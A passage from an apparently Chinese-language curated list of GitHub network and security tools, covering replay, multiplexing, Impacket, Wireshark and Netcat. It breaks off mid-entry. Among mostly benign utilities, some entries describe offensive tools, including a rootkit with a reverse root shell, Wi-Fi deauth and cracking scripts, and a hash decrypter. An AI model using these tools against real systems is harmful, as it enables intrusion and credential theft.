Version](https://github.com/alphaSeclab/awesome-network-stuff/blob/master/Readme_en.md) # ็›ฎๅฝ• - [ๅทฅๅ…ท](#1a9934198e37d6d06b881705b863afc8) - [(1) ๆ”ถ้›†](#74ecf59705f3b800caed3664c6d32624) - [ๆœชๅˆ†็ฑป](#56acb7c49c828d4715dce57410d490d1) - [(40) Replay&&้‡ๆ’ญ](#58b6684347a223e01d4d76d9ca185a88) - [(1) ้€šไฟกๅ่ฎฎ](#e810979fcdfaefc2375a65e9b3f3a11c) - [(7) Multiplexer](#dd2b52e59921ad730fceac252d99dd77) - [(7) Impacket](#0effa0fb88eb72a133563727d42910d9) - [(30) Wireshark](#6fa0e0d1f898fba299b2566a33602841) - [(16) Netcat](#b35965810463fb97b1ca26d94a8b62f0) - [(21) Scapy](#01f99d208e245eb44f15f720043b50d4) - [(8) Tcpdump](#b293f791ec9366957733415323755aa6) - [pcap](#f13469c9891173804423be4403b2c4ff) - [(58) ๆœชๅˆ†็ฑป](#eb49514924c3f4bf2acf6f3a4436af13) - [(3) ่ฝฌๆข](#b239f12aca7aa942b45836032cbef99a) - [(2) ๆ”ถ้›†](#d365897ae51adc286d4e6f6787924d69) - [(16) libpcap](#8bc2e181f74ba67ec93fd2a13d95cc0c) - [(5) WinPcap](#5303e6ae470e6def3b69d614674a1c46) - [(8) fiddler](#31d28e8b2cf6c06411cd5d178dbd3e77) - [(5) ็ฝ‘็ปœๆ•ฐๆฎๅŒ…](#64f068672e615343db9235f1973d8fba) - [(34) ๅ…ถไป–](#eec238a1a2657b70f7bbbe68a4421249) - [ไปฃ็†&&Proxy](#21cbd08576a3ead42f60963cdbfb8599) - [ๅทฅๅ…ท](#d03d494700077f6a65092985c06bf8e8) - [(65) ๆœชๅˆ†็ฑป](#0ff94312f3ab4898f5996725133ea9d1) - [(17) HAProxy](#d3069cac6097830d12f5933c9c8b7a77) - [DNS](#6381920f17576b07cc87a8dc619123aa) - [(7) ๆœชๅˆ†็ฑป](#b0328a85ce70f4be618511259df159a9) - [(19) DNSCrypt](#191c4ddd413ed659f507ef4ad8c17818) - [(13) HTTP&&HTTPS](#b6f25145e99ea944cbb528a24afaa0be) - [V2Ray](#dbc310300d300ae45b04779281fe6ec8) - [(57) ๆœชๅˆ†็ฑป](#9a47326f72e25428c0163118b9eb42e5) - [(9) V2Ray-lib/GUI](#441d09c37d758425d97bcdb5e08a4256) - [(1) ๅธๅท](#e3e66ebfedb62affa6ef04eced00448f) - [(3) ๅฎ‰่ฃ…&&็ฎก็†](#733afa2680ce2eab471cddc5654cd95b) - [ๆจกๆฟ](#d34c4520a378177efaaa60911f07d8d0) - [ๅ…ถไป–](#1072cf1157d333483198c30028f65e5a) - [(3) proxychains](#160b0cdb52f30bdc3f222aa08c91d10d) - [Shadowsocks](#cb16466a31a167bb61f39e2a4a85f449) - [(51) ๆœชๅˆ†็ฑป](#60a91763cc1c0e034bee9717b9b87468) - [(4) ๅธๅท](#81bb199d6d8690cc6d7ddc92aa81f7f9) - [(2) ๅ…ถไป–](#81ba7ad53e5c5f4a9615923ba9595928) - [(3) ๆ’ไปถ](#bfe4545f8f585c6f19d28ae9d5912aff) - [(40) ShadowsocksR](#02a80eb3908819d75933198c6b9c6008) - [(6) Shadowsocks-ng](#0b7ec49dd41a16ce7ba58d399475e09f) - [(1) ๆ”ถ้›†](#bdf7adbb1e8c52aa89dc771aa5fedc4b) - [(42) Shadowsocks-lib/gui](#f90ec3d0727d2ee3840df6c9f9557756) - [(7) Docker](#82476f41454f4e55dcdcf45d817e0395) - [(18) ๅฎ‰่ฃ…&&็ฎก็†](#0a4e6103d8a48ee758983d56018076da) - [(94) Socks](#57b8e953d394bbed52df2a6976d98dfa) - [(11) ๅฎ‰่ฃ…&&้…็ฝฎ&&็ฎก็†](#8ff91c8095e77fe88dcac1cff78d79c6) - [ไปฃ็†็ˆฌๅ–&&ไปฃ็†ๆฑ ](#b2241c68725526c88e69f1d71405c6b2) - [(16) ๆŠ“ๅ–](#6d7e96fefef09f8ac350c8e9d77ec49c) - [(2) ไฝฟ็”จ](#4417ed293dcbe11e3b5057be518e670d) - [ๆ–‡็ซ ](#07fb7fc7f8ef8da762c2cc86c482a3f6) - [็ฟปๅข™&&GFW](#837c9f22a3e1bb2ce29a0fb2bcd90b8f) - [ๅทฅๅ…ท](#af9d2b4988d35a2a634c042a1c66bb8c) - [(1) ๆœชๅˆ†็ฑป](#fe72fb9498defbdbb98448511cd1eaca) - [(28) ็ฟปๅข™](#6e28befd418dc5b22fb3fd234db322d3) - [(38) GFW](#e9cc4e00d5851a7430a9b28d74f297db) - [ๆ–‡็ซ ](#8c94b343a7f1fb63a1ac538d032425a0) - [ๅŒฟๅ็ฝ‘็ปœ](#b03a7c05fd5b154ad593b6327578718b) - [ๅทฅๅ…ท](#6e80463404d46f0493cf6e84597e4b5c) - [(5) ๆœชๅˆ†็ฑป](#f0979cd783d1d455cb5e3207d574aa1e) - [(139) Tor&&&Onion&&ๆด‹่‘ฑ](#e99ba5f3de02f68412b13ca718a0afb6) - [(11) I2P](#ceb532aae106b39ea224c7aef786c831) - [ๆ–‡็ซ ](#7b28248ff4b6fe73675e3139109ef93d) - [้šง้“&&็ฉฟ้€&&ๅๅ‘ไปฃ็†](#e996f5ff54050629de0d9d5e68fcb630) - [ๅทฅๅ…ท](#01e6651181d405ecdcd92a452989e7e0) - [(36) ๆœชๅˆ†็ฑป](#ea4dfcd8f33ec1852180c6283b2c8516) - [(56) ๅๅ‘ไปฃ็†](#e9f97504fbd14c8bb4154bd0680e9e62) - [(125) ้šง้“&&็ฉฟ้€](#9d6789f22a280f5bb6491d1353b02384) - [(5) ๅ…ฌ็ฝ‘่ฎฟ้—ฎๅฑ€ๅŸŸ็ฝ‘](#8ea8f890cf767c3801b5e7951fca3570) - [ๆ–‡็ซ ](#c8cc22e067df97d3c58ac53b91ebe240) - [VPN](#891b953fda837ead9eff17ff2626b20a) - [(119) ๅทฅๅ…ท](#d62a971d37c69db9f3b9187318c3921a) - [(25) OpenVPN](#7cf7e8a30b73997985f20698eaf6b0c9) - [ไธญ้—ดไบบ&&MITM](#42ae221f526f55b5282ea221a376ec6c) - [(146) ๆœชๅˆ†็ฑป](#42f9e068b6511bcbb47d6b2b273097da) - [(1) ๆ”ถ้›†](#4958460c709a66ca528f1732117e8dfd) - [(12) mitmproxy](#b4959a15647a6dcf79901f76655d0ca8) - [ๅˆ†ๆž&&ๅ–่ฏ&&่ฏŠๆ–ญ&&ๆŽขๆŸฅ&&ๆฃ€ๆต‹&&ๅ—…ๆŽข](#3c28b67524f117ed555daed9cc99e35e) - [ๅทฅๅ…ท](#7bf0f5839fb2827fdc1b93ae6ac7f53d) - [(23) ๆœชๅˆ†็ฑป](#b346105580b0240d693020ce8719ebca) - [(2) ๅ่ฎฎๅˆ†ๆž](#8dd8c4c8d11c149aa803a221480687d2) - [(3) ็ฝ‘็ปœ่ฏŠๆ–ญ](#9dfefb87c4dc3288b2eddf6780e8ffb9) - [(4) ๅ–่ฏ](#b3811e8d4be5755957b0ec0e336715a2) - [(170) ๅ—…ๆŽข&&Sniff](#32739127f0c38d61b14448c66a797098) - [(14) ๆ•่Žท&&Capture](#d7485f829bd85cd784ff582cbddc8624) - [(1) ๆต้‡ๆฃ€ๆต‹](#471c124b012dbde8ea3288f35667efc8) - [(4) Xxๅˆ†ๆž](#07701b342951b5d7bfa839db7752f9dd) - [ๆ–‡็ซ ](#384f5e1bef62f815c6745062f2975ba7) - [็ฝ‘็ปœๆ”ปๅ‡ป](#53da0cc607b98c444ec0e50a0b77f754) - [ๅทฅๅ…ท](#295e14c39bf33cd5136be8ced9383746) - [(2) PortKnocking](#07f06751f1de7ddd1f6a95323f0191c8) - [(45) ไผช้€ &&Spoof](#f855508acfc870b1f0d90ff316f1dd75) - [(1) ๆฃ€ๆต‹็ป•่ฟ‡](#62b461e2ceead9edb75c1b51f6eecdfd) - [(21) ๆŠ•ๆฏ’&&Poisoning](#3bd67ee9f322e2c85854991c85ed6da0) - [Android](#c63cbfa77e689e485fc2d8bc5051f229) - [(21) ๅทฅๅ…ท](#863839860fab4b8601905205cac9b54f) - [iOS](#70857140d346b443fe3b7ea3046f702a) - [(13) ๅทฅๅ…ท](#692d86299dedab073fbb6144a5b2bd64) # <a id="1a9934198e37d6d06b881705b863afc8"></a>ๅทฅๅ…ท *** ## <a id="74ecf59705f3b800caed3664c6d32624"></a>ๆ”ถ้›† - [**1787**ๆ˜Ÿ][4y] [caesar0301/awesome-pcaptools](https://github.com/caesar0301/awesome-pcaptools) ็”จไบŽๅค„็†็ฝ‘็ปœ็—•่ฟน็š„ๅทฅๅ…ทๆ”ถ้›† *** ## <a id="56acb7c49c828d4715dce57410d490d1"></a>ๆœชๅˆ†็ฑป *** ## <a id="58b6684347a223e01d4d76d9ca185a88"></a>Replay&&้‡ๆ’ญ - [**12024**ๆ˜Ÿ][2m] [Go] [buger/goreplay](https://github.com/buger/goreplay) ๅฎžๆ—ถๆ•่ŽทHTTPๆต้‡ๅนถ่พ“ๅ…ฅๆต‹่ฏ•็Žฏๅขƒ๏ผŒไปฅไพฟๆŒ็ปญไฝฟ็”จ็œŸๅฎžๆ•ฐๆฎๆต‹่ฏ•ไฝ ็š„็ณป็ปŸ - [**8180**ๆ˜Ÿ][5d] [JS] [netflix/pollyjs](https://github.com/netflix/pollyjs) Record, Replay, and Stub HTTP Interactions. - [**4625**ๆ˜Ÿ][5d] [Ruby] [vcr/vcr](https://github.com/vcr/vcr) Record your test suite's HTTP interactions and replay them during future test runs for fast, deterministic, accurate tests. - [**4597**ๆ˜Ÿ][4d] [C++] [mozilla/rr](https://github.com/mozilla/rr) ่ฎฐๅฝ•ไธŽ้‡ๆ”พApp็š„่ฐƒ่ฏ•ๆ‰ง่กŒ่ฟ‡็จ‹ - [**3450**ๆ˜Ÿ][6m] [C] [session-replay-tools/tcpcopy](https://github.com/session-replay-tools/tcpcopy) tcpcopy๏ผšTCP ๆต้‡ๅ›žๆ”พๅทฅๅ…ท๏ผŒๅฏ็”จไบŽๆ€ง่ƒฝๆต‹่ฏ•ใ€็จณๅฎšๆ€งๆต‹่ฏ•ใ€ๅŽ‹ๅŠ›ๆต‹่ฏ•ใ€ๅŠ ่ฝฝๆต‹่ฏ•ใ€smoke ๆต‹่ฏ•็ญ‰ - [**1461**ๆ˜Ÿ][2y] [C++] [acaudwell/logstalgia](https://github.com/acaudwell/logstalgia) a visualization tool that replays or streams web server access logs as a retro arcade game simulation. - [**1417**ๆ˜Ÿ][1m] [Java] [chrisk44/hijacker](https://github.com/chrisk44/hijacker) Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android - [**605**ๆ˜Ÿ][30d] [Py] [webrecorder/pywb](https://github.com/webrecorder/pywb) ้‡ๆ”พๅ’Œ่ฎฐๅฝ•Webๅญ˜ๆกฃ - [**565**ๆ˜Ÿ][10d] [C] [appneta/tcpreplay](https://github.com/appneta/tcpreplay) Pcap ็ผ–่พ‘ๅ’Œ้‡ๆ”พๅทฅๅ…ท๏ผˆ้’ˆๅฏน*nixๅ’ŒWindows๏ผ‰ - [**262**ๆ˜Ÿ][2m] [Py] [felixweyne/imaginaryc2](https://github.com/felixweyne/imaginaryc2) Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads. - [**149**ๆ˜Ÿ][28d] [Py] [swehner/foos](https://github.com/swehner/foos) Instant replay system for foosball table - [**126**ๆ˜Ÿ][4y] [C] [ctxis/rdp-replay](https://github.com/ctxis/rdp-replay) ้‡ๆ’ญpcapๆ–‡ไปถไธญ็š„RDPๆต้‡ - [**87**ๆ˜Ÿ][8m] [Go] [seborama/govcr](https://github.com/seborama/govcr) HTTP mock for Golang: record and replay HTTP/HTTPS interactions for offline testing - [**82**ๆ˜Ÿ][2y] [JS] [dmarcos/aframe-motion-capture-components](https://github.com/dmarcos/aframe-motion-capture-components) Capture entity motions and replay them on other entities - [**78**ๆ˜Ÿ][1y] [Py] [ionelmc/python-aspectlib](https://github.com/ionelmc/python-aspectlib) An aspect-oriented programming, monkey-patch and decorators library. It is useful when changing behavior in existing code is desired. It includes tools for debugging and testing: simple mock/record and a complete capture/replay framework. - [**74**ๆ˜Ÿ][4m] [Lua] [dns-oarc/drool](https://github.com/dns-oarc/drool) DNS Replay Tool - [**73**ๆ˜Ÿ][2y] [Java] [spiderlabs/burplay](https://github.com/spiderlabs/burplay) Burplay is a Burp Extension allowing for replaying any number of requests using same modifications definition. Its main purpose is to aid in searching for Privilege Escalation issues. - [**72**ๆ˜Ÿ][28d] [C++] [rigtorp/udpreplay](https://github.com/rigtorp/udpreplay) ้‡ๆ’ญpcapๆ–‡ไปถไธญ็š„UDPๆ•ฐๆฎๅŒ… - [**69**ๆ˜Ÿ][9d] [Py] [catch-up-tv-and-more/plugin.video.catchuptvandmore](https://github.com/catch-up-tv-and-more/plugin.video.catchuptvandmore) Replay, Live TV and websites videos addon for Kodi - [**66**ๆ˜Ÿ][1m] [Py] [hatching/httpreplay](https://github.com/hatching/httpreplay) ๆ นๆฎTLSไธปๅฏ†้’ฅ๏ผŒ้‡ๆ’ญPCAPๆ–‡ไปถไธญ็š„HTTPๅ’ŒHTTPS่ฏทๆฑ‚ - [**60**ๆ˜Ÿ][3y] [Py] [iamckn/mousejack_transmit](https://github.com/iamckn/mousejack_transmit) Wireless mouse/keyboard attack with replay/transmit poc - [**59**ๆ˜Ÿ][23d] [C++] [whid-injector/whid-31337](https://github.com/whid-injector/whid-31337) WHID Elite is a GSM-enabled Open-Source Multi-Purpose Offensive Device that allows a threat actor to remotely inject keystrokes, bypass air-gapped systems, conduct mousejacking attacks, do acoustic surveillance, RF replay attacks and much more. In practice, is THE Wet Dream of any Security Consultant out there! - [**56**ๆ˜Ÿ][2m] [Shell] [125k/pwrdeauther](https://github.com/125K/PwrDeauther) This script allows you to deauth a specific SSID or an entire channel with mdk3 (MDK3 is more powerful than Aireplay) - [**56**ๆ˜Ÿ][2m] [Shell] [125k/pwrdeauther](https://github.com/125k/pwrdeauther) This script allows you to deauth a specific SSID or an entire channel with mdk3 (MDK3 is more powerful than Aireplay) - [**54**ๆ˜Ÿ][26d] [Java] [vy/hrrs](https://github.com/vy/hrrs) Record, transform, and replay HTTP requests in Java EE and Spring applications. - [**46**ๆ˜Ÿ][1y] [HTML] [octosavvi/espkey](https://github.com/octosavvi/espkey) Wiegand data logger, replay device and micro door-controller - [**43**ๆ˜Ÿ][1y] [Py] [nirizr/pytest-idapro](https://github.com/nirizr/pytest-idapro) ่พ…ๅŠฉๅฏนIDAPython่„šๆœฌ่ฟ›่กŒๅ•ๅ…ƒๆต‹่ฏ• - [**34**ๆ˜Ÿ][24d] [C] [dns-oarc/dnsjit](https://github.com/dns-oarc/dnsjit) Engine for capturing, parsing and replaying DNS - [**33**ๆ˜Ÿ][29d] [C] [root670/cheatdeviceps2](https://github.com/root670/cheatdeviceps2) Game enhancer for PlayStation 2 similar to Action Replay, GameShark, and CodeBreaker. - [**27**ๆ˜Ÿ][11d] [C] [microsoft/wafbench](https://github.com/microsoft/wafbench) WAFBench (wb) is a tool to measure the performance of WAF(Web Application Firewall) . It's based on latest code of ab (ApacheBench), and adds support for real trace replaying, framework of testing waf (FTW), and some other features. - [**26**ๆ˜Ÿ][1m] [Go] [linus4/csgoverview](https://github.com/linus4/csgoverview) A 2D demo replay tool for Counter Strike: Global Offensive. - [**25**ๆ˜Ÿ][4d] [TS] [airtasker/proxay](https://github.com/airtasker/proxay) Proxay is a record/replay proxy server that helps you write faster and more reliable tests. - [**21**ๆ˜Ÿ][2y] [Py] [pure-l0g1c/aircrack](https://github.com/pure-l0g1c/aircrack) Automatic Wifi Cracker. Uses Airodump, Aircrack, Aireplay - [**20**ๆ˜Ÿ][3y] [JS] [tunnelshade/pocuito](https://github.com/tunnelshade/pocuito) A tiny chrome extension to record and replay your web application proof-of-concepts. - [**19**ๆ˜Ÿ][3y] [cn0xroot/gr-replay](https://github.com/cn0xroot/gr-replay) ็”จไบŽGnuradio็š„ไฟกๅทๆ•ๆ‰ๅ’Œ้‡ๆ”พ - [**17**ๆ˜Ÿ][2y] [C] [deanjerkovich/rage_fuzzer](https://github.com/deanjerkovich/rage_fuzzer) a dumb protocol-unaware packet fuzzer/replayer - [**16**ๆ˜Ÿ][2y] [Lua] [withlin/kong-plugin-http-anti-replay-attack](https://github.com/withlin/kong-plugin-http-anti-replay-attack) ้˜ฒ้‡ๆ”พๆ”ปๅ‡ป - [**15**ๆ˜Ÿ][6m] [yuangongnd/remasc](https://github.com/yuangongnd/remasc) ReMASC: Realistic Replay Attack Corpus for Voice Controlled Systems - [**15**ๆ˜Ÿ][2y] [C#] [hackingthings/can-bus-arduino-tool](https://github.com/HackingThings/CAN-Bus-Arduino-Tool) A tool for performing replay and sniffing CAN bus traffic. - [**3**ๆ˜Ÿ][5y] [Haskell] [maurer/tachyon](https://github.com/maurer/tachyon) Record/Replay for syscall streams *** ## <a id="e810979fcdfaefc2375a65e9b3f3a11c"></a>้€šไฟกๅ่ฎฎ - [**1692**ๆ˜Ÿ][5m] [C] [networkprotocol/netcode.io](https://github.com/networkprotocol/netcode.io) ๅŸบไบŽUDP็š„ๅฎ‰ๅ…จ้€šไฟกๅ่ฎฎ *** ## <a id="dd2b52e59921ad730fceac252d99dd77"></a>Multiplexer - [**2530**ๆ˜Ÿ][1m] [C] [yrutschle/sslh](https://github.com/yrutschle/sslh) ๅบ”็”จๅ่ฎฎๅคš่ทฏๅค็”จๅ™จ๏ผˆไพ‹ๅฆ‚๏ผŒๅœจๅŒไธ€็ซฏๅฃไธŠๅ…ฑไบซSSHๅ’ŒHTTPS๏ผ‰ใ€‚ๆŽฅๅ—ๆŒ‡ๅฎš็ซฏๅฃไธŠ็š„่ฟžๆŽฅ๏ผŒๅนถๆ นๆฎๅฏน็ฌฌไธ€ไธชๆ•ฐๆฎๅŒ…็š„ๆต‹่ฏ•็ป“ๆžœๅฐ†ๅ…ถ่ฝฌๅ‘ - [**1056**ๆ˜Ÿ][20d] [C++] [simsong/tcpflow](https://github.com/simsong/tcpflow) TCP/IP ๆ•ฐๆฎๅŒ…ๅˆ†็”จๅ™จ - [**797**ๆ˜Ÿ][2m] [Go] [trivago/gollum](https://github.com/trivago/gollum) An n:m message multiplexer written in Go - [**728**ๆ˜Ÿ][1m] [C++] [stealth/sshttp](https://github.com/stealth/sshttp) SSH/HTTP(S) multiplexer. Run a webserver and a sshd on the same port w/o changes. - [**31**ๆ˜Ÿ][6m] [Py] [innogames/polysh](https://github.com/innogames/polysh) Polysh, the remote shell multiplexer - [**25**ๆ˜Ÿ][2y] [Py] [qiaofei32/tcp-multiplexer](https://github.com/qiaofei32/tcp-multiplexer) A TCP service multiplexer in Python - [**7**ๆ˜Ÿ][2m] [Py] [adafruit/adafruit_circuitpython_tca9548a](https://github.com/adafruit/adafruit_circuitpython_tca9548a) CircuitPython driver for the TCA9548A I2C Multiplexer. *** ## <a id="0effa0fb88eb72a133563727d42910d9"></a>Impacket - [**3922**ๆ˜Ÿ][5d] [Py] [secureauthcorp/impacket](https://github.com/SecureAuthCorp/impacket) Python็ฑปๆ”ถ้›†, ็”จไบŽไธŽ็ฝ‘็ปœๅ่ฎฎไบคไบ’ - [**381**ๆ˜Ÿ][1m] [Py] [fox-it/bloodhound.py](https://github.com/fox-it/bloodhound.py) ๅŸบไบŽPython็š„BloodHound Ingestor๏ผŒๅŸบไบŽImpacket - [**288**ๆ˜Ÿ][11m] [maaaaz/impacket-examples-windows](https://github.com/maaaaz/impacket-examples-windows) The great impacket example scripts compiled for Windows - [**203**ๆ˜Ÿ][5d] [Py] [ropnop/impacket_static_binaries](https://github.com/ropnop/impacket_static_binaries) Standalone binaries for Linux/Windows of Impacket's examples - [**88**ๆ˜Ÿ][10m] [Py] [dirkjanm/impacket](https://github.com/dirkjanm/impacket) Impacket is a collection of Python classes for working with network protocols. - [**71**ๆ˜Ÿ][7m] [Py] [zer1t0/ticket_converter](https://github.com/zer1t0/ticket_converter) A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket. - [**67**ๆ˜Ÿ][3y] [Py] [harmj0y/impdump](https://github.com/harmj0y/impdump) This is a simple parser for/decrypter for Impacket's esentutl.py utility. It assists with decrypting hashes and hash histories from ntds.dit databases. *** ## <a id="6fa0e0d1f898fba299b2566a33602841"></a>Wireshark - [**4857**ๆ˜Ÿ][5d] [Go] [gcla/termshark](https://github.com/gcla/termshark) A terminal UI for tshark, inspired by Wireshark - [**2409**ๆ˜Ÿ][4d] [C] [wireshark/wireshark](https://github.com/wireshark/wireshark) Wireshark - [**988**ๆ˜Ÿ][23d] [Py] [kiminewt/pyshark](https://github.com/kiminewt/pyshark) Python wrapper for tshark, allowing python packet parsing using wireshark dissectors - [**593**ๆ˜Ÿ][1y] [Py] [softscheck/tplink-smartplug](https://github.com/softscheck/tplink-smartplug) TP-Link WiFi SmartPlug Client and Wireshark Dissector - [**499**ๆ˜Ÿ][8m] [Rust] [cloudflare/wirefilter](https://github.com/cloudflare/wirefilter) An execution engine for Wireshark-like filters - [**354**ๆ˜Ÿ][2y] [Shell] [koenbuyens/kalirouter](https://github.com/koenbuyens/kalirouter) ๅฐ† KaliLinux ไธปๆœบ่ฝฌๅ˜ไธบ่ทฏ็”ฑๅ™จ๏ผŒไฝฟ็”จ Wireshark ่ฎฐๅฝ•ๆ‰€ๆœ‰็š„็ฝ‘็ปœๆต้‡๏ผŒๅŒๆ—ถๅฐ† HTTP/HTTPS ๆต้‡ๅ‘้€ๅˆฐๅ…ถไป–ไธปๆœบ็š„ๆ‹ฆๆˆชไปฃ็†๏ผˆไพ‹ๅฆ‚ BurpSuite๏ผ‰ - [**343**ๆ˜Ÿ][6y] [JS] [evilcos/cookiehacker](https://github.com/evilcos/cookiehacker) Cookieๅˆฉ็”จ - [**295**ๆ˜Ÿ][2m] [Lua] [pentesteracademy/patoolkit](https://github.com/pentesteracademy/patoolkit) ไธ€็ป„ๆต้‡ๅˆ†ๆžๆ’ไปถ๏ผŒ็”จไบŽๅฐ†Wireshark็š„ๅŠŸ่ƒฝไปŽๅพฎๅˆ†ๆžๅทฅๅ…ทๅ’Œๅ่ฎฎ่งฃๆžๅ™จๆ‰ฉๅฑ•ๅˆฐๅฎๅˆ†ๆžๅ™จๅ’Œๅจ่ƒ็ŒŽไบบใ€‚ - [**184**ๆ˜Ÿ][1y] [Lua] [ntop/wireshark-ntop](https://github.com/ntop/wireshark-ntop) Extensions for Wireshark - [**163**ๆ˜Ÿ][10m] [C] [davidgfnet/wireshark-whatsapp](https://github.com/davidgfnet/wireshark-whatsapp) Whatsapp dissector plugin for wireshark - [**151**ๆ˜Ÿ][11m] [Py] [wangshub/hmpa-pi](https://github.com/wangshub/hmpa-pi) ๅœจๆ ‘่Ž“ๆดพไธŠ๏ผŒๅˆฉ็”จ Wireshark ๆ‰ซๆ้™„่ฟ‘็ฝ‘็ปœ WiFi ่ฎพๅค‡๏ผŒๅนถๅฏนๆ‰ซๆ็ป“ๆžœ้€š่ฟ‡้‚ฎไปถๆˆ–่€…ๅพฎไฟก่ฟ›่กŒๆŽจ้€ - [**135**ๆ˜Ÿ][5y] [Py] [ashdnazg/pyreshark](https://github.com/ashdnazg/pyreshark) A Wireshark plugin providing a simple interface for writing dissectors in Python. - [**97**ๆ˜Ÿ][8m] [Shell] [shadowhatesyou/pipetap.sh](https://github.com/shadowhatesyou/pipetap.sh) This script invokes tcpdump over ssh piping to STDOUT, allowing remote use of wireshark - [**85**ๆ˜Ÿ][6y] [C] [armenb/sharktools](https://github.com/armenb/sharktools) Tools for programmatic parsing of packet captures using Wireshark functionality - [**68**ๆ˜Ÿ][3y] [CMake] [bastilleresearch/gr-nordic](https://github.com/bastilleresearch/gr-nordic) GNU Radio module and Wireshark dissector for the Nordic Semiconductor nRF24L Enhanced Shockburst protocol. - [**66**ๆ˜Ÿ][10m] [security-cheatsheet/wireshark-cheatsheet](https://github.com/security-cheatsheet/wireshark-cheatsheet) Wireshark Cheat Sheet - [**55**ๆ˜Ÿ][2m] [C] [secureauthcorp/sap-dissection-plug-in-for-wireshark](https://github.com/SecureAuthCorp/SAP-Dissection-plug-in-for-Wireshark) This Wireshark plugin provides dissection of SAP's NI, Diag, Enqueue, Router, Message Server, SNC and IGS protocols. - [**46**ๆ˜Ÿ][3y] [C] [rpcapd-linux/rpcapd-linux](https://github.com/rpcapd-linux/rpcapd-linux) ไธบWindows็‰ˆๆœฌ็š„Wiresharkๆไพ›่ฟœ็จ‹ๆต้‡ๆ•่Žท็š„ๅฎˆๆŠค็จ‹ๅบ - ้‡ๅคๅŒบๆฎต: [ๅˆ†ๆž->ๅทฅๅ…ท->ๆ•่Žท](#d7485f829bd85cd784ff582cbddc8624) | - [**40**ๆ˜Ÿ][6m] [Lua] [whitequark/zmtp-wireshark](https://github.com/whitequark/zmtp-wireshark) A Wireshark dissector for ZMTP version 3.0 and later (ZeroMQ 4 and later) - [**39**ๆ˜Ÿ][2y] [Lua] [bcsecorg/ethereum_devp2p_wireshark_dissector](https://github.com/bcsecorg/ethereum_devp2p_wireshark_dissector) This is Ethereum devp2p protocol dissector plugin for wireshark. - [**33**ๆ˜Ÿ][1y] [seemoo-lab/wireshark-awdl](https://github.com/seemoo-lab/wireshark-awdl) Wireshark Dissector for Apple Wireless Direct Link (AWDL) and Apple's CoreCapture logging framework. Note: the AWDL dissector is part of Wireshark 3.0! - [**21**ๆ˜Ÿ][12m] [Lua] [cloudshark/wireshark-plugin](https://github.com/cloudshark/wireshark-plugin) Upload captures directly to CloudShark from Wireshark - [**17**ๆ˜Ÿ][6m] [Lua] [markopaul0/wirebait](https://github.com/markopaul0/wirebait) Run and test your Lua Wireshark dissector without Wireshark or capture data. - [**9**ๆ˜Ÿ][2m] [C] [thephez/wireshark-plugin-dash](https://github.com/thephez/wireshark-plugin-dash) Wireshark dissector plugin for the Dash cryptocurrency protocol - [**6**ๆ˜Ÿ][1y] [Py] [kiminewt/pyshark-legacy](https://github.com/kiminewt/pyshark-legacy) Python wrapper for tshark, allowing python packet parsing using wireshark dissectors (Python2 legacy version) - [**2**ๆ˜Ÿ][6y] [C] [frederic/dfb-wireshark-dissector](https://github.com/frederic/dfb-wireshark-dissector) Wireshark dissector for Voodoo protocol, network layer of DirectFB. - [**2**ๆ˜Ÿ][11m] [Java] [nberktumer/comp416-packet-sniffer](https://github.com/nberktumer/comp416-packet-sniffer) A simple data transfer program using TCP written in Java for sniffing the data using WireShark - [**2**ๆ˜Ÿ][2y] [Lua] [sihaiyang0215/wiresharkdissector](https://github.com/sihaiyang0215/wiresharkdissector) Lua dissector for Minecraft 1.8.9 PC Edition - [**1**ๆ˜Ÿ][9m] [wtanaka/ansible-role-wireshark](https://github.com/wtanaka/ansible-role-wireshark) Ansible role to install wireshark - [**0**ๆ˜Ÿ][6y] [C] [mjeanson/wireshark-gmetric](https://github.com/mjeanson/wireshark-gmetric) Ganglia gmetric protocol dissector for Wireshark *** ## <a id="b35965810463fb97b1ca26d94a8b62f0"></a>Netcat - [**1357**ๆ˜Ÿ][4m] [Rust] [vi/websocat](https://github.com/vi/websocat) Command-line client for WebSockets, like netcat (or curl) for ws:// with advanced socat-like functions - [**831**ๆ˜Ÿ][2y] [PS] [besimorhino/powercat](https://github.com/besimorhino/powercat) PowerShellๅฎž็Žฐ็š„Netcat - [**490**ๆ˜Ÿ][3y] [PS] [secabstraction/powercat](https://github.com/secabstraction/powercat) ๅฏไธŽNetcatๅ’ŒNcatไธ€่ตทไฝฟ็”จ็š„PowerShell TCP / IP็‘žๅฃซๅ†›ๅˆ€ - [**329**ๆ˜Ÿ][6y] [C] [diegocr/netcat](https://github.com/diegocr/netcat) NetCat for Windows - [**264**ๆ˜Ÿ][1y] [JS] [roccomuso/netcat](https://github.com/roccomuso/netcat) Netcat client and server modules written in pure Javascript for Node.j - [**150**ๆ˜Ÿ][3y] [Py] [nullarray/pycat](https://github.com/nullarray/pycat) Python network tool, similar to Netcat with custom features. - [**41**ๆ˜Ÿ][6y] [PHP] [spiderlabs/upnp-request-generator](https://github.com/spiderlabs/upnp-request-generator) A tool to parse UPnP descriptor XML files and generate SOAP control requests for use with Burp Suite or netcat - [**33**ๆ˜Ÿ][1m] [Py] [rhelmot/nclib](https://github.com/rhelmot/nclib) Netcat as a python library - [**25**ๆ˜Ÿ][3y] [Py] [sc0tfree/netbyte](https://github.com/sc0tfree/netbyte) Netbyte is a Netcat-style tool that facilitates probing proprietary TCP and UDP services. It is lightweight, fully interactive and provides formatted output in both hexadecimal and ASCII. - [**20**ๆ˜Ÿ][2y] [C] [pinkp4nther/pinkit](https://github.com/pinkp4nther/pinkit) A quick LKM rootkit that executes a reverse TCP netcat shell with root privileges. - [**15**ๆ˜Ÿ][2y] [Swift] [vgmoose/nc-client](https://github.com/vgmoose/nc-client) [iOS] netcat gui app, for using the 10.1.x mach_portal root exploit on device - [**10**ๆ˜Ÿ][10m] [JS] [roccomuso/nc](https://github.com/roccomuso/nc) Porting Netcat in Node.js. CLI util. - [**7**ๆ˜Ÿ][7y] [C] [mainframed/nc110-omvs](https://github.com/mainframed/nc110-omvs) NetCat 110 with changes to support OMVS on z/OS - [**6**ๆ˜Ÿ][4y] [Py] [paradoxis/reverse-shell-client](https://github.com/paradoxis/reverse-shell-client) The reverse shell client is a Python based alternative for a netcat reverse shell listener - [**5**ๆ˜Ÿ][2y] [Shell] [foospidy/fuzzcat](https://github.com/foospidy/fuzzcat) 